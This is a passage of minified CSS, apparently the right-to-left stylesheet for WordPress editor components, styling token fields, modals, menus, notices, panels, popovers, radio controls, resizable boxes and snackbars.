box-shadow:none; color:var(--wp-components-color-foreground, #1e1e1e); display:inline-block; flex:1; font-family:inherit; font-size:16px; margin-right:4px; max-width:100%; min-height:24px; min-width:50px; padding:0; width:100%; } @media (min-width:600px){ .components-form-token-field__input-container input[type=text].components-form-token-field__input{ font-size:13px; } } .components-form-token-field.is-active .components-form-token-field__input-container input[type=text].components-form-token-field__input,.components-form-token-field__input-container input[type=text].components-form-token-field__input:focus{ box-shadow:none; outline:none; } .components-form-token-field__input-container .components-form-token-field__token+input[type=text].components-form-token-field__input{ width:auto; } .components-form-token-field__token{ color:#1e1e1e; display:flex; font-size:13px; max-width:100%; } .components-form-token-field__token.is-success .components-form-token-field__remove-token,.components-form-token-field__token.is-success .components-form-token-field__token-text{ background:#4ab866; } .components-form-token-field__token.is-error .components-form-token-field__remove-token,.components-form-token-field__token.is-error .components-form-token-field__token-text{ background:#cc1818; } .components-form-token-field__token.is-validating .components-form-token-field__remove-token,.components-form-token-field__token.is-validating .components-form-token-field__token-text{ color:#757575; } .components-form-token-field__token.is-borderless{ padding:0 0 0 24px; position:relative; } .components-form-token-field__token.is-borderless .components-form-token-field__token-text{ background:#0000; } .components-form-token-field__token.is-borderless:not(.is-disabled) .components-form-token-field__token-text{ color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-form-token-field__token.is-borderless .components-form-token-field__remove-token{ background:#0000; color:#757575; left:0; position:absolute; top:1px; } .components-form-token-field__token.is-borderless.is-success .components-form-token-field__token-text{ color:#4ab866; } .components-form-token-field__token.is-borderless.is-error .components-form-token-field__token-text{ color:#cc1818; padding:0 6px 0 4px; } .components-form-token-field__token.is-borderless.is-validating .components-form-token-field__token-text{ color:#1e1e1e; } .components-form-token-field__remove-token.components-button,.components-form-token-field__token-text{ background:#ddd; display:inline-block; height:auto; min-width:unset; } @media not (prefers-reduced-motion){ .components-form-token-field__remove-token.components-button,.components-form-token-field__token-text{ transition:all .2s cubic-bezier(.4, 1, .4, 1); } } .components-form-token-field__token-text{ border-radius:0 1px 1px 0; line-height:24px; overflow:hidden; padding:0 8px 0 0; text-overflow:ellipsis; white-space:nowrap; } .components-form-token-field__remove-token.components-button{ border-radius:1px 0 0 1px; color:#1e1e1e; line-height:10px; overflow:initial; } .components-form-token-field__remove-token.components-button:hover:not(:disabled){ color:#1e1e1e; } .components-form-token-field__suggestions-list{ flex:1 0 100%; max-height:128px; min-width:100%; overflow-y:auto; } @media not (prefers-reduced-motion){ .components-form-token-field__suggestions-list{ transition:all .15s ease-in-out; } } .components-form-token-field__suggestions-list{ box-shadow:inset 0 1px 0 0 #949494; list-style:none; margin:0; padding:0; } .components-form-token-field__suggestion{ box-sizing:border-box; color:var(--wp-components-color-foreground, #1e1e1e); display:block; font-size:13px; margin:0; min-height:32px; padding:8px 12px; } .components-form-token-field__suggestion.is-selected{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); color:var(--wp-components-color-foreground-inverted, #fff); } .components-form-token-field__suggestion[aria-disabled=true]{ color:#949494; pointer-events:none; } .components-form-token-field__suggestion[aria-disabled=true].is-selected{ background:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 4%, #0000); } .components-form-token-field__suggestion:not(.is-empty){ cursor:pointer; } @media (min-width:600px){ .components-guide{ width:600px; } } .components-guide .components-modal__content{ margin-top:0; padding:0; } .components-guide .components-modal__content:before{ content:none; } .components-guide .components-modal__header{ border-bottom:none; height:64px; padding:0; position:sticky; } .components-guide .components-modal__header .components-button{ align-self:flex-start; margin:8px 0 0 8px; position:static; } .components-guide .components-modal__header .components-button:hover svg{ fill:#fff; } .components-guide .components-guide__container{ display:flex; flex-direction:column; justify-content:space-between; margin-top:-64px; min-height:100%; } .components-guide .components-guide__page{ display:flex; flex-direction:column; justify-content:center; position:relative; } @media (min-width:600px){ .components-guide .components-guide__page{ min-height:300px; } } .components-guide .components-guide__footer{ align-content:center; display:flex; height:36px; justify-content:center; margin:0 0 24px; padding:0 32px; position:relative; width:100%; } .components-guide .components-guide__page-control{ margin:0; text-align:center; } .components-guide .components-guide__page-control li{ display:inline-block; margin:0; } .components-guide .components-guide__page-control .components-button{ color:#e0e0e0; margin:-6px 0; } .components-guide .components-guide__page-control li[aria-current=step] .components-button{ color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-modal__frame.components-guide{ border:none; max-height:575px; min-width:312px; } @media (max-width:600px){ .components-modal__frame.components-guide{ margin:auto; max-width:calc(100vw - 32px); } } .components-button.components-guide__back-button,.components-button.components-guide__finish-button,.components-button.components-guide__forward-button{ position:absolute; } .components-button.components-guide__back-button{ right:32px; } .components-button.components-guide__finish-button,.components-button.components-guide__forward-button{ left:32px; } [role=region]{ position:relative; } .is-focusing-regions [role=region]:focus:after,[role=region].interface-interface-skeleton__content:focus-visible:after{ bottom:0; content:""; left:0; pointer-events:none; position:absolute; right:0; top:0; z-index:1000000; } .is-focusing-regions .editor-post-publish-panel,.is-focusing-regions .interface-interface-skeleton__actions .editor-layout__toggle-entities-saved-states-panel,.is-focusing-regions .interface-interface-skeleton__actions .editor-layout__toggle-publish-panel,.is-focusing-regions .interface-interface-skeleton__sidebar .editor-layout__toggle-sidebar-panel,.is-focusing-regions [role=region]:focus:after,.is-focusing-regions.is-distraction-free .interface-interface-skeleton__header .edit-post-header,[role=region].interface-interface-skeleton__content:focus-visible:after{ outline-color:var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-2/var(--wp-block-editor-iframe-zoom-out-scale, 1)); outline-style:solid; outline-width:calc(var(--wp-admin-border-width-focus)*2/var(--wp-block-editor-iframe-zoom-out-scale, 1)); } .components-menu-group+.components-menu-group{ border-top:1px solid #1e1e1e; padding-top:8px; } .components-menu-group+.components-menu-group.has-hidden-separator{ border-top:none; margin-top:0; padding-top:0; } .components-menu-group:has(>div:empty){ display:none; } .components-menu-group__label{ color:#757575; font-size:11px; font-weight:500; margin-bottom:12px; margin-top:4px; padding:0 8px; text-transform:uppercase; white-space:nowrap; } .components-menu-item__button,.components-menu-item__button.components-button{ width:100%; } .components-menu-item__button.components-button[role=menuitemcheckbox] .components-menu-item__item:only-child,.components-menu-item__button.components-button[role=menuitemradio] .components-menu-item__item:only-child,.components-menu-item__button[role=menuitemcheckbox] .components-menu-item__item:only-child,.components-menu-item__button[role=menuitemradio] .components-menu-item__item:only-child{ box-sizing:initial; padding-left:48px; } .components-menu-item__button .components-menu-items__item-icon,.components-menu-item__button.components-button .components-menu-items__item-icon{ display:inline-block; flex:0 0 auto; } .components-menu-item__button .components-menu-items__item-icon.has-icon-right,.components-menu-item__button.components-button .components-menu-items__item-icon.has-icon-right{ margin-left:-2px; margin-right:24px; } .components-menu-item__button .components-menu-item__shortcut+.components-menu-items__item-icon.has-icon-right,.components-menu-item__button.components-button .components-menu-item__shortcut+.components-menu-items__item-icon.has-icon-right{ margin-right:8px; } .components-menu-item__button .block-editor-block-icon,.components-menu-item__button.components-button .block-editor-block-icon{ margin-left:8px; margin-right:-2px; } .components-menu-item__button.components-button.is-primary,.components-menu-item__button.is-primary{ justify-content:center; } .components-menu-item__button.components-button.is-primary .components-menu-item__item,.components-menu-item__button.is-primary .components-menu-item__item{ margin-left:0; } .components-menu-item__button.components-button:disabled.is-tertiary,.components-menu-item__button.components-button[aria-disabled=true].is-tertiary,.components-menu-item__button:disabled.is-tertiary,.components-menu-item__button[aria-disabled=true].is-tertiary{ background:none; color:var(--wp-components-color-accent-darker-10, var(--wp-admin-theme-color-darker-10, #2145e6)); opacity:.3; } .components-menu-item__info-wrapper{ display:flex; flex-direction:column; margin-left:auto; } .components-menu-item__info{ color:#757575; font-size:12px; margin-top:4px; white-space:normal; } .components-menu-item__item{ align-items:center; display:inline-flex; margin-left:auto; min-width:160px; white-space:nowrap; } .components-menu-item__shortcut{ align-self:center; color:currentColor; display:none; margin-left:0; margin-right:auto; padding-right:24px; } @media (min-width:480px){ .components-menu-item__shortcut{ display:inline; } } .components-menu-items-choice,.components-menu-items-choice.components-button{ height:auto; min-height:40px; } .components-menu-items-choice svg,.components-menu-items-choice.components-button svg{ margin-left:12px; } .components-menu-items-choice.components-button.has-icon,.components-menu-items-choice.has-icon{ padding-right:12px; } .components-modal__screen-overlay{ background-color:#00000059; bottom:0; display:flex; left:0; position:fixed; right:0; top:0; z-index:100000; } @keyframes __wp-base-styles-fade-in{ 0%{ opacity:0; } to{ opacity:1; } } @media not (prefers-reduced-motion){ .components-modal__screen-overlay{ animation:__wp-base-styles-fade-in .08s linear 0s; animation-fill-mode:forwards; } } @keyframes __wp-base-styles-fade-out{ 0%{ opacity:1; } to{ opacity:0; } } @media not (prefers-reduced-motion){ .components-modal__screen-overlay.is-animating-out{ animation:__wp-base-styles-fade-out .08s linear 80ms; animation-fill-mode:forwards; } } .components-modal__frame{ box-sizing:border-box; } .components-modal__frame *,.components-modal__frame :after,.components-modal__frame :before{ box-sizing:inherit; } .components-modal__frame{ animation-fill-mode:forwards; animation-name:components-modal__appear-animation; animation-timing-function:cubic-bezier(.29, 0, 0, 1); background:#fff; border-radius:8px 8px 0 0; box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005; color:#1e1e1e; display:flex; margin:40px 0 0; overflow:hidden; width:100%; } .components-modal__frame h1,.components-modal__frame h2,.components-modal__frame h3{ color:#1e1e1e; } @media not (prefers-reduced-motion){ .components-modal__frame{ animation-duration:var(--modal-frame-animation-duration); } } .components-modal__screen-overlay.is-animating-out .components-modal__frame{ animation-name:components-modal__disappear-animation; animation-timing-function:cubic-bezier(1, 0, .2, 1); } @media (min-width:600px){ .components-modal__frame{ border-radius:8px; margin:auto; max-height:calc(100% - 128px); max-width:calc(100% - 32px); min-width:350px; width:auto; } } @media (min-width:600px) and (min-width:600px){ .components-modal__frame.is-full-screen{ height:calc(100% - 32px); max-height:none; width:calc(100% - 32px); } } @media (min-width:600px) and (min-width:782px){ .components-modal__frame.is-full-screen{ height:calc(100% - 80px); max-width:none; width:calc(100% - 80px); } } @media (min-width:600px){ .components-modal__frame.has-size-large,.components-modal__frame.has-size-medium,.components-modal__frame.has-size-small{ width:100%; } .components-modal__frame.has-size-small{ max-width:384px; } .components-modal__frame.has-size-medium{ max-width:512px; } .components-modal__frame.has-size-large{ max-width:840px; } } @media (min-width:960px){ .components-modal__frame{ max-height:70%; } } @keyframes components-modal__appear-animation{ 0%{ opacity:0; transform:scale(.9); } to{ opacity:1; transform:scale(1); } } @keyframes components-modal__disappear-animation{ 0%{ opacity:1; transform:scale(1); } to{ opacity:0; transform:scale(.9); } } .components-modal__header{ align-items:center; border-bottom:1px solid #0000; box-sizing:border-box; display:flex; flex-direction:row; height:72px; justify-content:space-between; padding:24px 32px 8px; position:absolute; right:0; top:0; width:100%; z-index:10; } .components-modal__header .components-modal__header-heading{ font-size:1.2rem; font-weight:600; } .components-modal__header h1{ line-height:1; margin:0; } .components-modal__content.has-scrolled-content:not(.hide-header) .components-modal__header{ border-bottom-color:#ddd; } .components-modal__header+p{ margin-top:0; } .components-modal__header-heading-container{ align-items:center; display:flex; flex-direction:row; flex-grow:1; justify-content:flex-start; } .components-modal__header-icon-container{ display:inline-block; } .components-modal__header-icon-container svg{ max-height:36px; max-width:36px; padding:8px; } .components-modal__content{ flex:1; margin-top:72px; overflow:auto; padding:4px 32px 32px; } .components-modal__content.hide-header{ margin-top:0; padding-top:32px; } .components-modal__content.is-scrollable:focus-visible{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; outline-offset:-2px; } .components-notice{ align-items:center; background-color:#fff; border-right:4px solid var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); color:#1e1e1e; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; padding:8px 12px; } .components-notice.is-dismissible{ position:relative; } .components-notice.is-success{ background-color:#eff9f1; border-right-color:#4ab866; } .components-notice.is-warning{ background-color:#fef8ee; border-right-color:#f0b849; } .components-notice.is-error{ background-color:#f4a2a2; border-right-color:#cc1818; } .components-notice__content{ flex-grow:1; margin:4px 0 4px 25px; } .components-notice__actions{ display:flex; flex-wrap:wrap; } .components-notice__action.components-button,.components-notice__action.components-button.is-link{ margin-right:12px; } .components-notice__action.components-button.is-secondary{ vertical-align:initial; } .components-notice__action.components-button{ margin-left:8px; } .components-notice__dismiss{ align-self:flex-start; color:#757575; flex-shrink:0; } .components-notice__dismiss:not(:disabled):not([aria-disabled=true]):focus,.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):active,.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):hover{ background-color:initial; color:#1e1e1e; } .components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):hover{ box-shadow:none; } .components-notice-list{ box-sizing:border-box; max-width:100vw; } .components-notice-list .components-notice__content{ line-height:2; margin-bottom:12px; margin-top:12px; } .components-notice-list .components-notice__action.components-button{ display:block; margin-right:0; margin-top:8px; } .components-panel{ background:#fff; border:1px solid #e0e0e0; } .components-panel>.components-panel__body:first-child,.components-panel>.components-panel__header:first-child{ margin-top:-1px; } .components-panel>.components-panel__body:last-child,.components-panel>.components-panel__header:last-child{ border-bottom-width:0; } .components-panel+.components-panel{ margin-top:-1px; } .components-panel__body{ border-bottom:1px solid #e0e0e0; border-top:1px solid #e0e0e0; } .components-panel__body h3{ margin:0 0 .5em; } .components-panel__body.is-opened{ padding:16px; } .components-panel__header{ align-items:center; border-bottom:1px solid #ddd; box-sizing:initial; display:flex; flex-shrink:0; height:47px; justify-content:space-between; padding:0 16px; } .components-panel__header h2{ color:inherit; font-size:inherit; margin:0; } .components-panel__body+.components-panel__body,.components-panel__body+.components-panel__header,.components-panel__header+.components-panel__body,.components-panel__header+.components-panel__header{ margin-top:-1px; } .components-panel__body>.components-panel__body-title{ display:block; font-size:inherit; margin-bottom:0; margin-top:0; padding:0; } @media not (prefers-reduced-motion){ .components-panel__body>.components-panel__body-title{ transition:background .1s ease-in-out; } } .components-panel__body.is-opened>.components-panel__body-title{ margin:-16px -16px 5px; } .components-panel__body>.components-panel__body-title:hover{ background:#f0f0f0; border:none; } .components-panel__body-toggle.components-button{ border:none; box-shadow:none; color:#1e1e1e; font-weight:500; outline:none; padding:16px 16px 16px 48px; position:relative; text-align:right; width:100%; } @media not (prefers-reduced-motion){ .components-panel__body-toggle.components-button{ transition:background .1s ease-in-out; } } .components-panel__body-toggle.components-button{ height:auto; } .components-panel__body-toggle.components-button:focus{ border-radius:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-panel__body-toggle.components-button .components-panel__arrow{ color:#1e1e1e; left:16px; position:absolute; top:50%; transform:translateY(-50%); fill:currentColor; } @media not (prefers-reduced-motion){ .components-panel__body-toggle.components-button .components-panel__arrow{ transition:color .1s ease-in-out; } } body.rtl .components-panel__body-toggle.components-button .dashicons-arrow-right{ -ms-filter:fliph; filter:FlipH; margin-top:-10px; transform:scaleX(-1); } .components-panel__icon{ color:#757575; margin:-2px 6px -2px 0; } .components-panel__body-toggle-icon{ margin-left:-5px; } .components-panel__color-title{ float:right; height:19px; } .components-panel__row{ align-items:center; display:flex; justify-content:space-between; margin-top:8px; min-height:36px; } .components-panel__row select{ min-width:0; } .components-panel__row label{ flex-shrink:0; margin-left:12px; max-width:75%; } .components-panel__row:empty,.components-panel__row:first-of-type{ margin-top:0; } .components-panel .circle-picker{ padding-bottom:20px; } .components-placeholder.components-placeholder{ align-items:flex-start; box-sizing:border-box; color:#1e1e1e; display:flex; flex-direction:column; font-size:13px; gap:16px; margin:0; padding:24px; position:relative; text-align:right; width:100%; -moz-font-smoothing:subpixel-antialiased; -webkit-font-smoothing:subpixel-antialiased; background-color:#fff; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; outline:1px solid #0000; } .components-placeholder__error,.components-placeholder__fieldset,.components-placeholder__instructions,.components-placeholder__label{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; letter-spacing:normal; line-height:normal; text-transform:none; } .components-placeholder__label{ align-items:center; display:flex; font-weight:600; } .components-placeholder__label .block-editor-block-icon,.components-placeholder__label .dashicon,.components-placeholder__label>svg{ margin-left:4px; fill:currentColor; } @media (forced-colors:active){ .components-placeholder__label .block-editor-block-icon,.components-placeholder__label .dashicon,.components-placeholder__label>svg{ fill:CanvasText; } } .components-placeholder__label:empty{ display:none; } .components-placeholder__fieldset,.components-placeholder__fieldset form{ display:flex; flex-direction:row; flex-wrap:wrap; gap:16px; justify-content:flex-start; width:100%; } .components-placeholder__fieldset form p,.components-placeholder__fieldset p{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; } .components-placeholder__fieldset.is-column-layout,.components-placeholder__fieldset.is-column-layout form{ flex-direction:column; } .components-placeholder__input[type=url]{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .components-placeholder__input[type=url]{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-placeholder__input[type=url]{ font-size:13px; line-height:normal; } } .components-placeholder__input[type=url]:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); outline:2px solid #0000; } .components-placeholder__input[type=url]::-webkit-input-placeholder{ color:#1e1e1e9e; } .components-placeholder__input[type=url]::-moz-placeholder{ color:#1e1e1e9e; } .components-placeholder__input[type=url]:-ms-input-placeholder{ color:#1e1e1e9e; } .components-placeholder__input[type=url]{ flex:1 1 auto; } .components-placeholder__error{ gap:8px; width:100%; } .components-placeholder__fieldset .components-button:not(.is-link)~.components-button.is-link{ margin-left:10px; margin-right:10px; } .components-placeholder__fieldset .components-button:not(.is-link)~.components-button.is-link:last-child{ margin-left:0; } .components-placeholder.is-medium .components-placeholder__instructions,.components-placeholder.is-small .components-placeholder__instructions{ display:none; } .components-placeholder.is-medium .components-placeholder__fieldset,.components-placeholder.is-medium .components-placeholder__fieldset form,.components-placeholder.is-small .components-placeholder__fieldset,.components-placeholder.is-small .components-placeholder__fieldset form{ flex-direction:column; } .components-placeholder.is-medium .components-button,.components-placeholder.is-medium .components-placeholder__fieldset>*,.components-placeholder.is-small .components-button,.components-placeholder.is-small .components-placeholder__fieldset>*{ justify-content:center; width:100%; } .components-placeholder.is-small{ padding:16px; } .components-placeholder.has-illustration{ backdrop-filter:blur(100px); backface-visibility:hidden; background-color:initial; border-radius:0; box-shadow:none; color:inherit; display:flex; } .is-dark-theme .components-placeholder.has-illustration{ background-color:#0000001a; } .components-placeholder.has-illustration .components-placeholder__fieldset{ margin-left:0; margin-right:0; } .components-placeholder.has-illustration .components-button,.components-placeholder.has-illustration .components-placeholder__instructions,.components-placeholder.has-illustration .components-placeholder__label{ opacity:0; pointer-events:none; } @media not (prefers-reduced-motion){ .components-placeholder.has-illustration .components-button,.components-placeholder.has-illustration .components-placeholder__instructions,.components-placeholder.has-illustration .components-placeholder__label{ transition:opacity .1s linear; } } .is-selected>.components-placeholder.has-illustration .components-button,.is-selected>.components-placeholder.has-illustration .components-placeholder__instructions,.is-selected>.components-placeholder.has-illustration .components-placeholder__label{ opacity:1; pointer-events:auto; } .components-placeholder.has-illustration:before{ background:currentColor; bottom:0; content:""; left:0; opacity:.1; pointer-events:none; position:absolute; right:0; top:0; } .components-placeholder.has-illustration{ overflow:hidden; } .is-selected .components-placeholder.has-illustration{ overflow:auto; } .components-placeholder__preview{ display:flex; justify-content:center; } .components-placeholder__illustration{ box-sizing:initial; height:100%; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); width:100%; stroke:currentColor; opacity:.25; } .components-popover{ box-sizing:border-box; } .components-popover *,.components-popover :after,.components-popover :before{ box-sizing:inherit; } .components-popover{ will-change:transform; z-index:1000000; } .components-popover.is-expanded{ bottom:0; left:0; position:fixed; right:0; top:0; z-index:1000000 !important; } .components-popover__content{ background:#fff; border-radius:4px; box-shadow:0 0 0 1px #ccc,0 2px 3px #0000000d,0 4px 5px #0000000a,0 12px 12px #00000008,0 16px 16px #00000005; box-sizing:border-box; width:min-content; } .is-alternate .components-popover__content{ border-radius:2px; box-shadow:0 0 0 1px #1e1e1e; } .is-unstyled .components-popover__content{ background:none; border-radius:0; box-shadow:none; } .components-popover.is-expanded .components-popover__content{ box-shadow:0 -1px 0 0 #ccc; height:calc(100% - 48px); overflow-y:visible; position:static; width:auto; } .components-popover.is-expanded.is-alternate .components-popover__content{ box-shadow:0 -1px 0 #1e1e1e; } .components-popover__header{ align-items:center; background:#fff; display:flex; height:48px; justify-content:space-between; padding:0 16px 0 8px; } .components-popover__header-title{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:100%; } .components-popover__close.components-button{ z-index:5; } .components-popover__arrow{ display:flex; height:14px; pointer-events:none; position:absolute; width:14px; } .components-popover__arrow:before{ background-color:#fff; content:""; height:2px; left:1px; position:absolute; right:1px; top:-1px; } .components-popover__arrow.is-top{ bottom:-14px !important; transform:rotate(0); } .components-popover__arrow.is-right{ left:-14px !important; transform:rotate(90deg); } .components-popover__arrow.is-bottom{ top:-14px !important; transform:rotate(180deg); } .components-popover__arrow.is-left{ right:-14px !important; transform:rotate(-90deg); } .components-popover__triangle{ display:block; flex:1; } .components-popover__triangle-bg{ fill:#fff; } .components-popover__triangle-border{ fill:#0000; stroke-width:1px; stroke:#ccc; } .is-alternate .components-popover__triangle-border{ stroke:#1e1e1e; } .components-radio-control{ border:0; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; margin:0; padding:0; } .components-radio-control__group-wrapper.has-help{ margin-block-end:12px; } .components-radio-control__option{ align-items:center; column-gap:8px; display:grid; grid-template-columns:auto 1fr; grid-template-rows:auto minmax(0, max-content); } .components-radio-control__input[type=radio]{ border:1px solid #1e1e1e; border-radius:50%; grid-column:1; grid-row:1; height:24px; margin-left:12px; max-width:24px; min-width:24px; position:relative; transition:none; width:24px; } @media not (prefers-reduced-motion){ .components-radio-control__input[type=radio]{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-radio-control__input[type=radio]{ height:16px; max-width:16px; min-width:16px; width:16px; } } .components-radio-control__input[type=radio]:checked:before{ background-color:#fff; border:4px solid #fff; box-sizing:inherit; height:12px; margin:0; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); width:12px; } @media (min-width:600px){ .components-radio-control__input[type=radio]:checked:before{ height:8px; width:8px; } } .components-radio-control__input[type=radio]:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); } .components-radio-control__input[type=radio]:checked{ background:var(--wp-admin-theme-color); border:none; } .components-radio-control__input[type=radio]{ appearance:none; cursor:pointer; display:inline-flex; margin:0; padding:0; } .components-radio-control__input[type=radio]:focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:2px; } .components-radio-control__input[type=radio]:checked{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-radio-control__input[type=radio]:checked:before{ border-radius:50%; content:""; } .components-radio-control__label{ cursor:pointer; grid-column:2; grid-row:1; line-height:24px; } @media (min-width:600px){ .components-radio-control__label{ line-height:16px; } } .components-radio-control__option-description{ grid-column:2; grid-row:2; padding-block-start:4px; } .components-radio-control__option-description.components-radio-control__option-description{ margin-top:0; } .components-resizable-box__handle{ display:none; height:23px; width:23px; z-index:2; } .components-resizable-box__container.has-show-handle .components-resizable-box__handle{ display:block; } .components-resizable-box__handle>div{ height:100%; outline:none; position:relative; width:100%; z-index:2; } .components-resizable-box__container>img{ width:inherit; } .components-resizable-box__handle:after{ background:#fff; border-radius:50%; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)), 0 1px 1px #00000008, 0 1px 2px #00000005, 0 3px 3px #00000005, 0 4px 4px #00000003; content:""; cursor:inherit; display:block; height:15px; left:calc(50% - 8px); outline:2px solid #0000; position:absolute; top:calc(50% - 8px); width:15px; } .components-resizable-box__side-handle:before{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-radius:9999px; content:""; cursor:inherit; display:block; height:3px; left:calc(50% - 1px); position:absolute; top:calc(50% - 1px); width:3px; } @media not (prefers-reduced-motion){ .components-resizable-box__side-handle:before{ transition:transform .1s ease-in; will-change:transform; } } .components-resizable-box__side-handle:before{ opacity:0; } .components-resizable-box__corner-handle,.components-resizable-box__side-handle{ z-index:2; } .components-resizable-box__side-handle.components-resizable-box__handle-bottom,.components-resizable-box__side-handle.components-resizable-box__handle-bottom:before,.components-resizable-box__side-handle.components-resizable-box__handle-top,.components-resizable-box__side-handle.components-resizable-box__handle-top:before{ border-left:0; border-right:0; right:0; width:100%; } .components-resizable-box__side-handle.components-resizable-box__handle-left,.components-resizable-box__side-handle.components-resizable-box__handle-left:before,.components-resizable-box__side-handle.components-resizable-box__handle-right,.components-resizable-box__side-handle.components-resizable-box__handle-right:before{ border-bottom:0; border-top:0; height:100%; top:0; } @media not (prefers-reduced-motion){ .components-resizable-box__side-handle.components-resizable-box__handle-bottom:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-bottom:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:hover:before{ animation:components-resizable-box__top-bottom-animation .1s ease-out 0s; animation-fill-mode:forwards; } .components-resizable-box__side-handle.components-resizable-box__handle-left:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-left:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:hover:before{ animation:components-resizable-box__left-right-animation .1s ease-out 0s; animation-fill-mode:forwards; } } @media not all and (min-resolution:0.001dpcm){ @supports (-webkit-appearance:none){ .components-resizable-box__side-handle.components-resizable-box__handle-bottom:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-bottom:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-left:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-left:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:hover:before{ animation:none; } } } @keyframes components-resizable-box__top-bottom-animation{ 0%{ opacity:0; transform:scaleX(0); } to{ opacity:1; transform:scaleX(1); } } @keyframes components-resizable-box__left-right-animation{ 0%{ opacity:0; transform:scaleY(0); } to{ opacity:1; transform:scaleY(1); } } .components-resizable-box__handle-right{ right:-11.5px; } .components-resizable-box__handle-left{ left:-11.5px; } .components-resizable-box__handle-top{ top:-11.5px; } .components-resizable-box__handle-bottom{ bottom:-11.5px; } .components-responsive-wrapper{ align-items:center; display:flex; justify-content:center; max-width:100%; position:relative; } .components-responsive-wrapper__content{ display:block; max-width:100%; width:100%; } .components-sandbox{ overflow:hidden; } iframe.components-sandbox{ width:100%; } body.lockscroll,html.lockscroll{ overflow:hidden; } .components-select-control__input{ outline:0; -webkit-tap-highlight-color:rgba(0, 0, 0, 0) !important; } .components-snackbar{ backdrop-filter:blur(16px) saturate(180%); background:#000000d9; border-radius:4px; box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005; box-sizing:border-box; color:#fff; cursor:pointer; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; max-width:600px; padding:12px 20px; pointer-events:auto; width:100%; } @media (min-width:600px){ .components-snackbar{ width:fit-content; } } .components-snackbar:focus{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-snackbar.components-snackbar-explicit-dismiss{ cursor:default; } .components-snackbar .components-snackbar__content-with-icon{ padding-right:24px; position:relative; } .components-snackbar .components-snackbar__icon{ position:absolute; right:-8px; top:-2.9px; } .components-snackbar .components-snackbar__dismiss-button{ cursor:pointer; margin-right:24px; } .components-snackbar__action.components-button,.components-snackbar__action.components-external-link{ color:#fff; flex-shrink:0; margin-right:32px; } .components-snackbar__action.components-button:focus,.components-snackbar__action.components-external-link:focus{ box-shadow:none; outline:1px dotted #fff; } .components-snackbar__action.components-button:hover,.components-snackbar__action.components-external-link:hover{ color:currentColor; text-decoration:none; } .components-snackbar__content{ align-items:baseline; display:flex; justify-content:space-between; line-height:1.4; } .components-snackbar-list{ box-sizing:border-box; pointer-events:none; position:absolute; width:100%; z-index:100000; } .components-snackbar-list__notice-container{ padding-top:8px; position:relative; } .components-tab-panel__tabs{ align-items:stretch; display:flex; 